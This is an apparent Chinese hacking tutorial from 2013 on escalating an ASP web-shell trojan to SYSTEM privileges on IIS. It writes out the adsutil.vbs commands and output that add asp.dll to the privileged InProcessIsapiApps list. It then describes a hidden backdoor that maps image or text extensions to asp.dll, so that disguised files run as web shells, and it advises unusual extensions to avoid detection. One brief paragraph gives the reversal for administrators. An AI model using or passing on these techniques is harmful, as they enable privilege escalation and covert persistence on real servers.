浅谈提升asp木马权限[续]

2013 年 8 月 9 日4900

  作者:Linzi[F.L.Y] 来源:http://http://www.zjjv.com//
   target=_blank>http://http://www.zjjv.com//">http://http://www.zjjv.com//


  网络上传统的提升asp权限为系统的有两种:

  1.图形化下的,把默认站点--主目录-应用程序保护设置为低,这样就可以把asp权限设置为system.

  但这种提升方法很容易被发现,所以网络有另一种一般是用adsutil.vbs来提升权限.而这个也是今天

  我要谈的关于adsutil.vbs提升权限.

  2.用adsutil.vbs搞定.

  在网络上我看到了很多的教你用这种方法的动画,文章,但我至今没有看到一篇介绍原理的,下面我谈谈我个人的看法:

  先举个例子:

  有一群狗,这群狗里有几个长老级狗物,它们拥有着至高无上的权限,而其它的狗,他们的权限则少得可怜.

  转到计算机上:

  在IIS中,有几个Dll文件是拥有特权限的,我们可以理解为系统权限,就像长老级的狗.而解析asp的asp.dll则就像一只

  普通的狗,他的权限少得可怜.

  那么,如果asp.dll也成了长老级的狗的话,那么asp不也就有了系统权限了吗,这是可以成立的.所以我们的思路也就是

  把asp.dll加入特权的dll一族之中.提升步骤为:

  先查看有特权一话有哪些.

  加asp.dll加入特权一族

  好了,下面我们就来实践这个过程.

  1)查看有特权的dll文件:

  命令为:cscriptadsutil.vbsget/W3SVC/InProcessIsapiApps

  得到显示为:

  C:\Inetpub\AdminScripts>cscriptadsutil.vbsget/W3SVC/InProcessIsapiApps

  Microsoft(R)Windows脚本宿主版本5.1forWindows

  版权所有(C)MicrosoftCorporation1996-1999.Allrightsreserved.

  InProcessIsapiApps:(LIST)(5Items)

  "C:\WINNT\system32\idq.dll"

  "C:\WINNT\system32\inetsrv\httpext.dll"

  "C:\WINNT\system32\inetsrv\httpodbc.dll"

  "C:\WINNT\system32\inetsrv\ssinc.dll"

  "C:\WINNT\system32\msw3prt.dll"

  看到没有,他说明的是有特权限一族为:idq.dllhttpext.dllhttpodbc.dllssinc.dllmsw3prt.dll

  这几个文件,不同的机子,可能会不同.

  2)把asp.dll加入特权一族:

  因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll(不同的机子放的位置不一定相同)

  我们现在加进去cscriptadsutil.vbsset/W3SVC/InProcessIsapiApps"C:\WINNT\system32\idq.dll""C:\WINNT\system32\inetsrv\httpext.dll""C:\WINNT\system32\inetsrv\httpodbc.dll""C:\WINNT\system32\inetsrv\ssinc.dll""C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"

  好了,现在你可以用cscriptadsutil.vbsget/W3SVC/InProcessIsapiApps来查看是不是加进去

  了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\Inetpub\AdminScripts>这个目录下.

  那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dllT出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.

  例:cscriptadsutil.vbsset/W3SVC/InProcessIsapiApps"C:\WINNT\system32\idq.dll""C:\WINNT\system32\inetsrv\httpext.dll""C:\WINNT\system32\inetsrv\httpodbc.dll""C:\WINNT\system32\inetsrv\ssinc.dll""C:\WINNT\system32\msw3prt.dll"

  这样就可以了,当你再用cscriptadsutil.vbsget/W3SVC/InProcessIsapiApps这个语句查之时,如果没有看见asp.dll,

  说明,asp的权限又恢复到以前的权限.

  待续.....先去上课.

  几个月前写了一篇文章关于提升asp木马权限,后来又有了续篇,但是没发表出来,在笔记里,这段日子

  一直在研究构造一个jpg木马或gif木马。可以说成果不大,如果真要说成果的话,只能说构造出了IIS的完美

  后门.---------------------题记

  1.jpg后门

  通过上一篇,我们知道,asp有权限,主要是asp.dll来解析的,所以我们的思路也很明了,如果让asp.dll

  来解析jpp等图片呢,实践上是成立的。下面我们我实现过程写出来。

  a.在IIS管理器中右击主机->属性->WWW服务编辑->主目录配置->应用程序映射如图

  在可执行文件里我们填入asp.dll的路径C:\WINNT\System32\inetsrv\asp.dll

  而扩展名也就是我们的后门的扩展名,可以是jpg,也可以是bmp等等,随你喜欢。

  接下来就是一路确定。

  2.效果

  好了,现在我们来看一下我们的成果

  而这个jpg木马和asp木马一样,除了扩展名不一样,其它的功能全部一样。

  哈哈,又一种全新的后门思路了。

  3.总结:

  好了,上面的只是一个思路,我个人建立最好不要用jpg,可以换bmp,txt,htm等别人不常用的来

  做为扩展。可以说上面的是目前最好的后门的一个思路。、

  我们还在研究和asp木马一样的图片木马,也希望网络上的大虾可以加入我们的行列,加到我们

  的群里和我们一群讨论。有兴趣的可以加我的QQ:358899807,如果你是菜鸟请不要加了。谢谢

  合作。

0 0